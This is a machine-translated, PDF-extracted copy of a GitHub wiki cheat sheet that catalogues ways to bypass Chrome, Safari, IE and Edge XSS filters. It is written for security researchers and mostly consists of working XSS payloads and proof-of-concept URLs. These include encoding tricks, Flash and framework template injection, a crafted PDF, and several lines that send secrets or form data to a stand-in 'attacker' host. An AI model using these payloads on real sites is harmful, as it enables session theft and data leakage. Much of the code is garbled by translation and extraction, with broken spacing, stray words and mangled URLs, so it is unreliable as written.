Browser's XSS Filter Bypass Cheat Sheet Masatokinugawa - Filterbypass Wiki GitHub

1/1/2018 Browser's XSS Filter Bypass Cheat Sheet · masatokinugawa / filterbypass Wiki · GitHub
masatokinugawa / filterbypass
Browser's XSS Filter Bypass Cheat Sheet

Masato Kinugawa edited this page on Oct 18, 2017 · 28 revisions
XSS Auditor, XSS filter bypass. Those running on the latest version of Chrome / Safari, IE 11 / Edge Pages 3
are eligible for publication. If you are in the position to diagnose the vulnerability, if you are a
security researcher to convincingly prove that it is attackable, please help us to find further bypass. Home
Posting is what you can bypass in general circumstances. Even if the method is not listed here, it is Browser's XSS Filter Bypass
not determined that it can not be misused in the actual situation. Regardless of whether it can be Cheat Sheet
bypassed, it is always advisable to undertake fundamental XSS measures.
Fixed Bypass Archive
table of contents Clone this wiki locally
https://github.com/masatoki
XSS Auditor
Those not to be blocked Clone in Desktop
XSS occurring in string literals
XSS which is established by URL alone (eg when the input value directly enters the
href part of a tag)
When there are two or more injection points
When there is manipulation of a character string
When deleted
When it is substituted
DOM based XSS other than request.write () request string
XSS in XML page
http (s): Create link
A tag that can send requests to the outside
Describe any CSS
bypass
Using <object> and <param name = url / code> (Chrome only)
Using the values attribute of SVG animation (Safari only)
Use of multiple null characters (Safari only)
Using comments by -> in script tag (Safari only)
Using an odd base tag (Safari only)
Using Flash
Using a script loaded with relative URL
Use of ISO-2022-JP escape sequence
Use link and odd base tag
Use of resources of the same domain
Case where XSS is on path (Chrome only)
File upload function
Use Flash and flashvars
Use of Flash's ExternalInterface.objectID and ExternalInterface.call ()
Using Angular
Use of Vue.js
Using jQuery
Using underscore.js
Use of JSX conversion script such as JSXTransformer / babel-standalone
Use of an odd form tag (information acquisition only) (Safari only)
Past bypass
IE / Edge's XSS filter
Those not to be blocked
https://github.com/masatokinugawa/filterbypass/wiki/Browser's-XSS-Filter-Bypass-Cheat-Sheet 1/20
All DOM based XSS

XSS with more than one injection point per page
When deleted
bypass
Use of disguised character string in XML namespace (Edge only)
Use of the escape sequence of HZ-GB-2312
Use of encoding behavior during navigation
Using the Adobe Acrobat Reader plug-in (IE only)
Use of Content Sniffing in XML (IE only)
UTF-7 BOM usage (IE only)
Use <? PXML> (IE only)
Using referrers
Use of the link function in the same domain (including subdomain)
Bypass at where you can specify any URL
If you can keep the status before sending to a vulnerable form on the page
Using the option tag
Use of an empty iframe
Use referrer spoofing bug (Edge only)
Usage of formaction (information acquisition only)
Use of character-referenced character string in style (description of style only)
Past bypass
XSS Auditor

In a context where protection is not provided from the beginning, you can run scripts without any
special modification.

https://vulnerabledoma.in/bypass/str_literal?q=%22%3Balert(1)//
< script > var q = " " ; alert ( 1 ) // " < / script >
XSS which is established by URL alone (eg when the input value directly
enters the href part of a tag)
https://vulnerabledoma.in/bypass/link?q= javascript: alert (1)
< A Href = " Javascript: Alert (1) " > Link </ A >
When there are two or more injection points

(Although it appears to be able to block a considerable case occurring in more than two cases,
since it is WontFix in the case reported in the past ( # 96616 # 403636 ), it is classified as not
blocked.
https://vulnerabledoma.in/bypass/text?type=2&q=%60-alert(1)%3C/script%3E%3Cscript%3E%60
< div > `-alert (1) </ script > < script > ` </ div>
<div> ` - alert ( 1 ) < / script > < script > ` </ div>

When some character strings are deleted or replaced, they can not be blocked by putting the
character string in between.
When deleted
https://vulnerabledoma.in/bypass/text?type=6&q=%3Csvg%20o%3Cscript%3Enload=alert(1)% 3E
< svg o < script > nload = alert (1)>

↓
< svg onload = alert (1) >
https://vulnerabledoma.in/bypass/text?type=7&q=%3Cscript%3E/%26/-alert(1)%3C/script%3E
< script > / & / - alert ( 1 ) < / script >

↓
< script > / & amp ; / - alert ( 1 ) < / script >
document.write() DOM based XSS other than request strings

https://vulnerabledoma.in/bypass/dom_innerhtml#%3Cimg%20src=x%20onerror=alert(1)% 3E
< body >

< script >
hash = location . hash . slice ( 1 );
document . body . innerHTML = decodeURIComponent (hash);
< / script >
</ body >
https://vulnerabledoma.in/bypass/dom_redirect#javascript: alert (1)
< script >

location . href = decodeURIComponent ( location . hash . slice ( 1 ));
< / script >
XSS in XML page

https://vulnerabledoma.in/bypass/xml?
q=%3Cscript%20xmlns=%22http://www.w3.org/1999/xhtml%22%3Ealert(1)%3C/script%3E
<? xml version = " 1.0 " ?> < html > < script xmlns = " http://www.w3.org/1999/xhtml " > al
A character string can be described from the top of the page, and Content-Type if it is not
specified correctly, bypass is also caused when XML is selected by Content Sniffing.
https://vulnerabledoma.in/bypass/text?mime=unknown&q=%3C?xml%20version=%221.0%22?
%3E%3Cscript%20xmlns=%22http://www.w3.org/1999/xhtml% 22% 3 E alert (1)% 3 C / script% 3 E
<? xml version = " 1.0 " ?> < script xmlns = " http://www.w3.org/1999/xhtml " > alert (1) </
Those less than this are not able to execute the script, but the description is permitted, and it has
the possibility to be used for attack to some extent.
http (s): Create link

https://vulnerabledoma.in/bypass/text?
q=%3Ca%20href=https://attacker/%3ESession%20expired.%20Please%20login%20again.%3C/a%3
E
< A Href = Https: // Attacker .. /> Session Expired Please Login Again </ A >

In some cases it may be possible to include confidential information in requests such as images by
using quotes that do not close one side.
https://vulnerabledoma.in/bypass/text?type=8&q=%3Cimg%20src=%22https://attacker/?data=
< p > This is a secret text. </ p> <p id = " x " > AAA </ p> < p > < img src = " https: //
Describe any CSS

In addition to camouflaging the appearance of the page, if confidential information is included on
the same page, there is a possibility that information can be acquired using only CSS. See URL for
details.
Reference URL:
http://www.businessinfo.co.uk/labs/talk/The_Sexy_Assassin.ppt
http://masatokinugawa.l0.cm/2015/10/css-based-attack-abusing-unicode-range.html
q=%3Cstyle%3E@import%20%27//attacker/test.css%27%3C/style%3E
< Style > Attoimport ' //Attacker/test.Css ' </ Style>
q=%3Clink%20rel=stylesheet%20href=//attacker/test.css%3E
< link rel = stylesheet href = //attacker/test.css >
bypass
<object> And the <param name=url/code> use of (Chrome only)
Attackable conditions:
1. There is an XSS that can write arbitrary tags

2. Flash is available in target environment
Reference URL:
http://masatokinugawa.l0.cm/2016/12/xss12.html
PoC:
q=%3Cobject%20allowscriptaccess=always%3E%3Cparam%20name=url%20value=https://l0.cm/xs
s.swf%3E
< object permissions = always > < param name = url value = https://l0.cm/xss.swf >
q=%3Cobject%20allowscriptaccess=always%3E%3Cparam%20name=code%20value=https://l0.cm/
xss.swf%3E
< object permissions = always > < param name = code value = https://l0.cm/xss.swf >
Using the values attribute of SVG animation (Safari only)

Reference URL:
https://bugs.chromium.org/p/chromium/issues/detail?id=709365
PoC:
q=%3Csvg%20xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Canimate%20xlink:href=%23x%20
attributeName=%22xlink : 3 href% 22% 20% = 20% = 20% = 20% = 20% = 20% = 20% = 20% =
20% % 3C / a% 3E
< svg xmlns: xlink = http://www.w3.org/1999/xlink > < animate xlink: href = # x attribute
Use of multiple null characters (Safari only)


2. A null byte is output
3. There is no space character immediately before
Reference URL:
https://twitter.com/0rbz_/status/896896095862669312
PoC:
q=%00%00%00%00%00%00%00%3Cscript%3Ealert(1)%3C/script%3E
[0x00] [0x00] [0x00] [0x00] [0x00] [0x00] [0x00] < script > alert ( 1 ) < / script >
Using --> comments in script tag (Safari only)


2. There is a close tag of the script tag without inserting a line feed after it
Reference URL:
PoC:
https://vulnerabledoma.in/bypass/text?type=9&q=%3Cscript%3Ealert(1)% 0A--% 3E
< div > < script > alert ( 1 )

-> < / div > < script src = / test . js> < / script >
Using an odd base tag (Safari only)
Using Flash
2. There is no space character immediately after, '" there is after

Reference URL:
PoC:
(If there is no space character immediately after) https://vulnerabledoma.in/bypass/text?

type=3&q=% 3Combed%20allowscriptaccess= always
%20src=/xss.swf%3E%3Cbase%20href=//l0.cm /
< div > < embed allows scriptaccess = always src = / xss.swf > < base href = //l0.cm/ </
(If there is a space character immediately after) https://vulnerabledoma.in/bypass/text?

type=4&q=%3Combed%20allowscriptaccess=always%20src=/xss.swf%3E%3Cbase%20href=%22//l
0 .cm/
< div > < embed allows scriptaccess = always src = / xss.swf > < base href = " // l0. cm
Using a script loaded with relative URL

2. There is no space character immediately after, '" there is after
3. After that there is a part loading the script with relative URL
PoC:
https://vulnerabledoma.in/bypass/text?type=9&q=%3Cbase%20href=//cors.l0.cm/
< div > < base href = //cors.l0.cm/ </ div > < script src = /test.js > </ script >
Use of ISO-2022-JP escape sequence


2. There is no character code designation on the page
Supplement:
In the HTML of-2022-ISO JP, [0x1B](B , [0x1B](H , [0x1B](J byte sequence is ignored that. It can
be bypassed by sandwiching it between reaction character strings. Also, in Chrome / Safari, the
[0x1B]$@[0x0A] byte strings are [0x0A] handled in the same way, but XSS Auditor can not
interpret well and bypass occurs.
Reference URL:
https://l0.cm/encodings/test3/
PoC:
https://vulnerabledoma.in/bypass/text?q=%3Cmeta%20charset=iso-2022-
jp%3E%3Csvg%20o%1B(Bnload=alert(1)%3E
jp%3E%3Csvg%20o%1B(Hnload=alert(1)% 3E
jp%3E%3Csvg%20o%1B(Jnload=alert(1)% 3E
< meta charset = iso - 2022 - jp > < svg o [ 0 x 1 B ] ( Bnload = alert (1) >
(* Since the $ symbol is arbitrarily encoded and does not move as intended, it has a redirect in a
method that includes $)
jp%3E%3Cscript%3Ealert(1)% 1B$@%0A% 3C / script% 3E
jp%3E%3Cscript%3Ealert(1)% 1B$B% 0A% 3C / script% 3E
jp%3E%3Cscript%3Ealert(1)%1B(I%0A%3C/script%3E
jp%3E%3Cscript%3Ealert(1)%1B$@%0D%3C/script%3E
< meta charset = iso-2022-jp > < script > alert ( 1 ) [ 0x1B ] $ @ [ 0x0A ] < / script >
Use link and odd base tag


2. There is a space character immediately after
3. '" There is after that
Reference URL:
PoC:
https://vulnerabledoma.in/bypass/text?type=4&q=%3Ca%20href=/**/alert (1)% 3EXSS% 3C / a%

3E% 3Cbase% 20href =% 22 javascript: \
< Div > < A Href = / ** / Alert (1) > XSS </ A > < Base Href = " Javascript: \ </ Div> <Di
Use of resources of the same domain

XSS Auditor does not block loading of resources of the same domain without query. If resources
necessary for attack can be placed in the same domain, it is possible to bypass in some cases.
Case where XSS is on path (Chrome only)
1. XSS in arbitrary tag can be written in path

2. You do not need a query to display that page
PoC:
https://vulnerabledoma.in/bypass/path/%3Clink%20rel=import%20href=%22%2Fbypass%2Fpath%
2F%3Cscript%3Ealert(1 )%3C%2Fscript%3E% 22% 3E
PATH_INFO: / < link rel = import href = " / bypass / path / <script> alert (1) </ script>
File upload function

2. Hosting files uploaded by users to the same origin
PoC:
q=%3Cscript%20src=/bypass/usercontent/xss.js%3E%3C/script%3E
< script src = /bypass/usercontent/xss.js > </ script >
(Chrome only) https://vulnerabledoma.in/bypass/text?

q=%3Clink%20rel=import%20href=/https/www.scribd.com/bypass/usercontent/icon.jpg% 3E
< link rel = import href = /bypass/usercontent/icon.jpg >
And Flash flashvars use of

2. ExnternalInterface.call() There is Flash that passes parameter strings unprotected to the
same origin
Supplement:
flashvars By using attributes you can pass parameters directly without giving Flash parameters to
the query. (= On the Flash side, even if parameter passing from the URL is restricted as a
countermeasure against XSS by opening Flash directly flashvars , it can be passed in.)
Furthermore, Content-Security-Policy: default-src 'self' when there is a CSP like this, CSP
bypass Can also be used.
PoC:
csp=self&q=%3Cembed%20name=a%20flashvars=%27autoplay=true%26file=%22})\%22)-
(alert=alert(1))) } catch (e) {} //% 27% 20allowscriptaccess = always% 20src = //
vulnerabledoma.in/bypass/wp-includes/js/mediaelement/flashmediaelement.swf%3E
< Embed Name = A Flashvars = ' Autoplay = True Ando File = "}) \") - (Alert = Alert (1)))}
ActionScript:
ExternalInterface . Call ( "setTimeout" , ExternalInterface . ObjectID + '_event' + "(''
Flash of ExternalInterface.objectID the ExternalInterface.call() use of

2. The same origin ExternalInterface.objectID but ExternalInterface.call() there is a Flash,
which is passed to the
Supplement:
ExternalInterface.objectID Is a property to which the value of the name attribute of the tag used
for embedding is set and can not be XSS by itself, but it can be used only for bypass. It Content-
Security-Policy: default-src 'self' can also be used to bypass the CSP, such as when there is a
CSP limit like.
PoC:
https://vulnerabledoma.in/bypass/text?csp=self&q=%3Combed%20name=%27alert(1)-
%27%20allowscriptaccess=always%20src=//vulnerabledoma.in/bypass/wp-includes/js/
mediaelement / flashmediaelement.swf% 3E
< embed name = ' alert (1) - ' allows scriptaccess = always src = //vulnerabledoma.in/byp
ActionScript:
ExternalInterface . Call ( ExternalInterface . ObjectID Tasu '_Init' ) ;
Using Angular

2. On the same origin, there is a page hosting Angular or loading Angular from CDN
corresponding to CORS
Supplement:
Angular tries to expand the template enclosed in {{}} in the tag having the attribute ng-app.
Templates can execute scripts.
Reference URL:
http://blog.portswigger.net/2016/01/xss-without-html-client-side-template.html
PoC:
q=%3Cscript%20src=%22/js/angular1.6.4.min.js%22%3E%3C/script%3E%3Cp%20ng-app%3E {
{constructor.constructor (% 27 alert (1)% 27) ()}}
< script src = " /js/angular1.6.4.min.js " > </ script > < p ng-app > {{constructor.constr
If there is a page loading Angular from CDN corresponding to CORS on the same origin, you can
also load resources of external origin by indirectly loading from HTML Imports.
(Chrome only) https://vulnerabledoma.in/bypass/text?

q=%3Clink%20rel=import%20href=angular.html%3E%3Cp%20ng-app%3E{{constructor.constructor
( %27alert (1 )% 27) ()}}
< link rel = import href = angular.html > < p ng-app > {{constructor.constructor ('alert
Use of Vue.js

2. There is a page that is hosting Vue.js on the same origin or loading from CDN corresponding
to CORS
3. There is a script on the page or the same origin that can perform template expansion on
specially crafted tags
PoC:
(This example is for Chrome only) https://vulnerabledoma.in/bypass/text?

q=%3Clink%20rel=import%20href=/https/www.scribd.com/bypass/vue.html%3E%3Cdiv%20id=app%3E{{constructor.
constructor (% 27 alert (1)% 27) ()}}
< link rel = import href = / bypass / vue.html > < div id = app > {{constructor.construct
Using jQuery

2. There is a page loading jQuery from the CDN corresponding to CORS, hosting jQuery on the
same origin
3. A script capable of executing jQuery's additional function on a specially crafted form tag exists
on that page or on the same origin
Supplement:
The additional system function of JQuery, after , before , prepend , append , html , replaceWith ,
wrap , wrapAll , insertBefore , insertAfter , prependTo , appendTo such as thing.
ownerDocument By mistaking the reference destination of Node.ownerDocument by using the form
part having the name attribute named " DOM Clobbering " (this method is known as DOM
Clobbering ) at the scene where original scripts are not executed . Furthermore, there is a
process  comment section surrounded by is evaluated as a script.
PoC:
(This example is for Chrome only) https://vulnerabledoma.in/bypass/text?charset=utf-

8&type=1&q=%3Clink%20rel=import%20href=/https/www.scribd.com/bypass/babel-standalone.html%3E%3Csvg%3E %
3Cscript% 20type =% 22text / jsx% 22% 3E //% 3C! -% 0a alert (1) // -% 3E% 3C / svg% 3E%
3Cscript% 3E0% 3C / script% 3E
< link rel = import href = /bypass/babel-standalone.html > < svg > < script type = text /
alert (1) // -> </ svg> <script> 0 </ script >
Use of an odd form tag (information acquisition only) (Safari only)


2. A new form tag can be placed at a position where it can become the destination of the
existing form contents including confidential information
Reference URL:
PoC:
(If you are in the form) https://vulnerabledoma.in/bypass/form?

q=%22%3E%3C/form%3E%3Cform%20action=https://attacker/
< form action = " form " >

< input type = " hidden " name = " q " value = " " > </ form > < form action = https: //
<input type = " hidden " name = " secret " value = " a 09 d 3 ef 0 " >
<input type = " submit " >
</ form>
(If you are outside the form) https://vulnerabledoma.in/bypass/form2?

q=%3Cbutton%20form=f%3ECLICK%3Cform%20id=f%20action=https://attacker/
< div > < button form = f > CLICK < form id = f action = https: // attacker / </ div >
< Form Action = " Form2 " >
< input type = " hidden " name = " secret " value = "a 09 d 3 e f 0 " >
</ form >
Past bypass
Posted at Fixed Bypass Archive .
IE / Edge's XSS filter

Supplement:
Until then, there was a blocking condition for string literals. Although it remains partly at present
location , substitution to obviously attackable which had been blocked until then is permitted,
and it is equal to no protection. Since it seems that it does not intend to provide protection
anymore, it is classified as not bypassing, not being subject to blocking.
https://vulnerabledoma.in/bypass/str_literal?q=%22%3Blocation='javascript \ x3Aalert \ x281 \ x29

'//
< script > var q = " " ; location = ' javascript \ x3A alert \ x 28 1 \ x 29 ' // " < / scri
All DOM based XSS

https://vulnerabledoma.in/bypass/dom_docwrite#%3Cimg%20src=x%20onerror=alert(1)% 3E
< script >

document . write ( decodeURIComponent (hash));
< / script >
https://vulnerabledoma.in/bypass/dom_innerhtml#%3Cimg%20src=x%20onerror=alert(1)% 3E
< body >

< script >
document . body . innerHTML = decodeURIComponent (hash);
< / script >
</ body >
https://vulnerabledoma.in/bypass/dom_redirect#javascript: alert (1)
< script >

location . href = decodeURIComponent ( location . hash . slice ( 1 ));
< / script >
XSS with more than one injection point per page

type=2&q=%22src=data:,alert%25281%2529%3E%3C/script%3E%3Cscript%20x=%22
< Div > "Src = Data:, Alert Pasento 281 Pasento 29> </ Script > < Script X = " </ Div>
<Div> " Src = Data:, Alert Pasento 281 Pasento 29 > < / Script > < Script X = " </ div>
When some character strings are deleted or replaced, they can not be blocked by putting the
character string in between.
When deleted
https://vulnerabledoma.in/bypass/text?type=6&q=%3Csvg%20o%3Cscript%3Enload=alert(1)% 3E
< svg o < script > nload = alert (1)>

↓
< svg onload = alert (1) >
The regular expressions of the filter . at the position represented by, determined width can not be
shut off when the replacement or more were made.
In order <sc{r}ipt.*?> to avoid a match to the blocking condition in the following case, & we use
an operation that is over substituted. / Is & a wild card with 0-3 characters, 0-5 characters, so the
maximum width that can be blocked is 8 characters. /& The character string length of the
output after replacement is 10 characters and it can not be blocked because it exceeds the width of
8 characters.
PoC:
https://vulnerabledoma.in/bypass/text?type=10&q=%3Cscript/%26%3Ealert(1)%3C/script%3E
< script / &> alert (1) </ script>

↓
<script / & amp;> alert (1) </ script >
Those less than this are not able to execute the script, but the description is permitted, and it has
the possibility to be used for attack to some extent.

In some cases it may be possible to include confidential information in requests such as images by
using quotes that do not close one side.
https://vulnerabledoma.in/bypass/text?type=8&q=%3Cimg%20src=%22https://attacker/?data=
< p > This is a secret text. </ p> <p id = " x " > AAA </ p> < p > < img src = " https: //
bypass
Use of disguised character string in XML namespace (Edge only)


2. Flash is enabled in target environment
3. X-XSS-Protection:1; mode-block Header not attached
Supplement:
Edge will also try to block tags with XML namespace. <embed/:script If you use a character string
like in a normal HTML, it is interpreted as a script tag, which should originally be interpreted as an
embed tag, and fails to block. Since the blocking operation has occurred X-XSS-Protection:1;
mode-block , bypassing fails if a header is attached.
Reference URL:
PoC:
q=%3Cembed/:script%20allowscriptaccess=always%20src=//l0.cm/xss.swf%3E
< embed /: script allowing scriptaccess = always src = //l0.cm/xss.swf >
Use of the escape sequence of HZ-GB-2312


2. Content-Type There is no character code designation in the header
Reference URL:
PoC:
https://vulnerabledoma.in/bypass/text?q=%3Cx~%
0Aonfocus=alert%281%29%20id=a%20tabindex=0%3E#a
< x ~
onfocus = alert (1) id = a tabindex = 0 >
Use of encoding behavior during navigation

1. There is reflective XSS via GET
Supplement:
When navigating, IE / Edge sends a request by encoding the query string with the character code
of the page before navigation. At this time, the XSS filter was able to cause a discrepancy between
(probably) the encoded string and the actually transmitted byte, since it is checking the encoded
string itself, not the request being sent In case a bypass occurs.
A specific example is shown with the character code x-chinese-cns used in the following PoC. In x-
chinese- 旡 cns the letter is mapped to 0xA13E. At this time, a query including this character string
is <script/旡 transmitted from a page on which x-chinese-cns is set as the character code of the
page attached to a parameter having reflection XSS. Then, the transmitted request is 旡 not a
representation of UTF-8, but a byte encoded by x-chinese- </script/0xA1> cns itself (0x3E is > ),
and <script> tags are written in the page . Normally if <script> you write a tag, the XSS filter
should work, but it will not work here. This reason is presumed to be because the filter sees
<script/旡 the character string mistakenly <sc{r}ipt.*?> and did not match the blocking
condition .
Reference URL:
PoC:
https://l0.cm/bypass/ie_x-chinese-cns_text.html
< meta charset = utf-8 >

< script >
document . charset = " x-chinese-cns " ;
location = " https://vulnerabledoma.in/bypass/text?q=< script / 旡alert (1) < \ / script /
< / script >
(In case of XSS with attribute value only) https://l0.cm/bypass/ie_x-chinese-cns_attribute.html
< meta charset = utf-8 >

< script >
document . charset = " x - chinese -
cns " ; location = " https://vulnerabledoma.in/bypass/attribute?q= 乜 onmouseover = alert
< / script >
Even with other character codes, if you mismatch between the encoded character string and the
actually transmitted byte string, you can bypass it.
https://l0.cm/bypass/ie_hz_text.html
https://l0.cm/bypass/ie_hz_attribute.html
https://l0.cm/bypass/ie_iso2022jp_text.html
https://l0.cm/bypass/ie_iso2022jp_attribute.html
(Although it seems that the operating principle seems to be slightly different from the other
vectors, it does not understand the clear principle though it reproduces in the environment of the
Japanese locale but it did not reproduce in the German environment. Posted on.
https://l0.cm/bypass/ie_0xff_text.html
https://l0.cm/bypass/ie_0xff_attribute.html
Using the Adobe Acrobat Reader plug-in (IE only)

1. I have an XSS via a POST request

2. The target is using the Adobe Acrobat Reader plug-in
Reference URL:
http://insert-script.blogspot.com/2017/01/complete-internet-explorer-xss-filter.html
PoC:
https://l0.cm/bypass/ie_postxss_bypass.pdf
%PDF-1.1
1 0 obj
<<
/Type /Catalog
/Outlines 2 0 R
/Pages 3 0 R
/OpenAction 33 0 R
/AcroForm 22 0 R
>>
endobj
2 0 obj
<<
/Type /Outlines
/Count 0
>>
endobj
3 0 obj
<<
/Type /Pages
/Kids [4 0 R]
/Count 1
>>
endobj
4 0 obj
<<
/Type /Page
/Annot [ 23 0 R ]
/Parent 3 0 R
/MediaBox [0 0 612 792]
/Contents 5 0 R
/Resources <<
/ProcSet [/PDF /Text]
/Font << /F1 6 0 R >>
>>
>>
endobj
5 0 obj
<< /Length 56 >>
stream
BT /F1 12 Tf 100 700 Td 15 TL (JavaScript example) Tj ET
endstream
endobj
6 0 obj
<<
/Type /Font
/Subtype /Type1
/Name /F1
/BaseFont /Helvetica
/Encoding /MacRomanEncoding
>>
endobj
33 0 obj
<<
/S /SubmitForm
/F
<<
% URL TO SUBMIT TO:
/F (https://vulnerabledoma.in/bypass/text)
/FS /URL
>>
% SPECIFIES THE FORMAT AND OTHER FORM RELATED CONFIGURATION
/Flags 6
>>
endobj
22 0 obj
<<
/Fields [23 0 R]
>>
endobj
23 0 obj
<<
/DA (/Helv 12 Tf 0 g)
/F 4
/FT /Tx
/Rect [ 9.526760 680.078003 297.527008 702.078003 ]
/Subtype /Widget
/Type /Annot
% PARAMETER NAME
/T (q)
% PARAMETER PAYLOAD
/V (<script>alert$1$</script>)
/P 4 0 R
>>
endobj
trailer
<<
/Root 1 0 R
>>
Use of Content Sniffing in XML (IE only)


2. X-Content-Type-Options:nosniff It is not on
3. A character string can be described from the top of the page
Reference URL:
https://twitter.com/0x6D6172696F/status/753647521050849280
PoC:
https://vulnerabledoma.in/bypass/text?q=%3C?xml%20version=%221.0%22?
%3E%3Cx:script%20xmlns:x=%22http://www.w3.org/1999/ xhtml% 22% 3 Elal% 281% 26% 23 x
29% 3 B% 3 C / x: script% 3 E
<? Xml Version = " 1.0 " <?> X : Script Xmlns : X = " Http://Www.W3.Org/1999/xhtml " > Aler
UTF-7 BOM usage (IE only)

1. A character string can be described from the top of the page

2. + , / , - Description of the symbols are allowed, such as
Supplement:
+/v8 , +/v9 , +/v+ , +/v/ The of-7 UTF BOM are treated as. In IE, when this character string is at
the top of the page, the character code of that page is assumed to be UTF - 7. Even if a character
code is specified in the page, if you history.back() reopen it via, the character code of that page
will be treated as UTF - 7. (Note that the behavior of the latter has already been reported to
Microsoft in July 2013, but no change in behavior has been made up to now.)
PoC:
(When character code is not specified on page) https://vulnerabledoma.in/bypass/text?q=%2B/v8-

%2BADw-script%2BAD4-alert(1)%2BADw-/script%2BAD4-
+ / v 8 - + ADw - script + AD 4 - alert (1) + ADw - / script + AD 4 -
(When character code is specified on page) https://l0.cm/bypass/ie_utf7.html
< script >

function go () {
window . open ( " https://vulnerabledoma.in/bypass/text?q=%2B/v8-%2BADw-script%2BAD4-alert(l
< / script >

< button onclick = go () > go </ button >
<?PXML> Use of (IE only)
1. There is a reflective XSS

2. Three or more < do not come up to the injection point
3. The document mode of the page is set to 9 or less, the document mode of 9 or less can be set
by embedding in the frame etc.
Reference URL:
PoC:
https://vulnerabledoma.in/bypass/text?q=%3C?
PXML%3E%3Chtml:script%3Ealert(1)%3C/html:script%3E&xuac=9
<? PXML> < html : script > alert (1) </ html : script >
q=%3CPXML%3E%3Chtml:script%3Ealert(1)%3C/html:script%3E&xuac=9
< PXML > < html : script > alert (1) </ html : script >
Using referrers
The XSS filter of IE / Edge does not operate the XSS filter in the case where Referer header from the
same domain (including subdomain) or localhost is attached. If such a referrer can be attached, it is
possible to bypass.
Use of the link function in the same domain (including subdomain)

2. You can create links to XSS pages in the same domain (including subdomains)
PoC:
https://vulnerabledoma.in/bypass/same-domain-link.html
https://www.vulnerabledoma.in/bypass/same-domain-link.html
< A Href = " Https://Vulnerabledoma.In/bypass/text?Q= <Script> Alert (1) </ Script> " > Cli
Bypass at where you can specify any URL
1. Reflective type XSS is possible on the link
Supplement:
By linking vulnerable sites twice and adding referrers, links to javascript: URLs can be created
without reacting XSS filters.
PoC:
https://vulnerabledoma.in/bypass/link?q=?q=javascript%253Aalert(1)
< A Href = " ? Q = Javascript Pasento 3Aalert (1) " > Link </ A >
If you can keep the status before sending to a vulnerable form on the page

2. You can keep the state before sending to a vulnerable form on a page of the same domain
(including subdomain)
PoC:
https://vulnerabledoma.in/bypass/form?
q=%26%23x22%3B%3E%26%23x3C%3Bscript%3Ealert%26%23x28%3B1)%26%23x3C%3B/script%3
E

< input type = " hidden " name = " q " value = " & # x22; > & # x3C; script> alert & # x2
< input type = " submit " >
</ form >
Using the option tag

2. That XSS is in an existing form
Reference URL:
https://html5sec.org/xssfilter/entities
PoC:
https://vulnerabledoma.in/bypass/form3?
q=%3Cbutton%20formaction=form3%3ECLICK%3Cselect%20name=q%3E%3Coption%3E% 26lt%
3Bscript%3Ealert (1)% 26lt% 3B / script% 3E
< form action = submit >

< button formaction = form3 > CLICK < select name = q > < option > & lt; script> alert (1)
</ form >
Use of an empty iframe

2. The page allows embedding in the frame
Supplement:
If you create an empty iframe in XSS and navigate to the URL where you wrote the script to that
frame, bypassing will occur due to the referer of the vulnerable domain itself.
Reference URL:
http://www.cracking.com.ar/bugs/2016-07-14/
PoC:
https://l0.cm/bypass/ieedge_iframe.html
<! - Found by @ magicmac2000 ->

< iframe onload = " contentWindow [0] .location = '// vulnerabledoma.in/bypass/text?q=<scri
Use referrer spoofing bug (Edge only)
Reference URL:
https://www.brokenbrowser.com/referer-spoofing-patch-bypass/
PoC:
https://l0.cm/bypass/edge_referer_spoofing.html
< script >

// Found by @ magicmac 2000
Function Go () {
Var Win = Window . Open ( " Edge_referer_spoofing_redirector " ); Var Ifr = Win . Document .
Alert ( 'Wait'); Opener.Location = 'Https:? //Vulnerabledoma.In/bypass/text Q = <Script> Ale

}
< / script >
< button onclick = go () > go </ button >
Usage of formaction (information acquisition only)

2. A new formaction attribute can be written at a position where it can be a destination of

existing form contents including confidential information
PoC:
https://vulnerabledoma.in/bypass/form?q=%22%3E%3Cbutton%20formaction=//attacker/% 3E

< input type = " hidden " name = " q " value = " " > < button formaction = / / attacker
< input type = " submit " >
</ form >
Use of character-referenced character string in style (description of style

only)

2. It is possible to attack with CSS
Supplement:
Which is part of the reaction strings @ , : , \ , ( for entity reference notation such is not
considered, the bypass takes place in style block or attribute values in SVG which entity reference
notation is allowed. In IE, behavior:url() it is possible to execute scripts through not only attacks
that read information with CSS, but also in some cases .
Reference URL:
https://twitter.com/0x6D6172696F/status/752190911879184384
http://www.businessinfo.co.uk/labs/talk/The_Sexy_Assassin.ppt
https://blog.innerht.ml/cascading-style-scripting/
PoC:
